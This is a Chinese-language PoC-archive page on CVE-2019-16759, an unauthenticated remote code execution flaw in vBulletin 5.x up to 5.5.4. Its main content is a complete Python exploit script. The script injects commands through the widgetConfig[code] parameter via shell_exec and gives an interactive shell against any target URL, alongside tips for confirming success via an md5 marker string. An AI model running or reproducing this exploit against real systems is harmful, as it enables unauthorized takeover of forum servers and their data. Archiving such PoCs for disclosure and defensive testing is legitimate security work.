关联漏洞
标题:vBulletin 输入验证错误漏洞 (CVE-2019-16759)Description:vBulletin是美国InternetBrands和vBulletinSolutions公司的一款基于PHP和MySQL的开源Web论坛程序。 vBulletin 5.x版本至5.5.4版本中存在安全漏洞。攻击者可借助‘widgetConfig[code]’参数利用该漏洞执行命令。
Description
vBulletin 5.x 未授权远程代码执行漏洞
介绍
# CVE-2019-16759 vBulletin 5.x 未授权远程代码执行漏洞

## Ps: 有些poc发包过去是403 ,而不是200
增强判断:echo md5('vBulletin');
判断返回包中是否存在be4ea51d962be8308a0099ae1eb3ec63
`print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]`

## CVE-2019-16759.py
```
import requests
import sys
if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
proxies ={
"http":"http://127.0.0.1:8080/"
}
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = raw_input(">>>Shell= ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
r = requests.post(url = sys.argv[1], data = params, proxies=proxies)
if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:
print
print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception, e:
sys.exit(str(e))
```
## 参考链接:
https://seclists.org/fulldisclosure/2019/Sep/31
文件快照
[4.0K] /data/pocs/dbb197b19d2b11ca80f2cb10aeebea3b7b19e6af
├── [370K] CVE-2019-16759.jpg
├── [2.0K] CVE-2019-16759.py
├── [1.2K] README.md
└── [304K] vBulletin.jpg
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →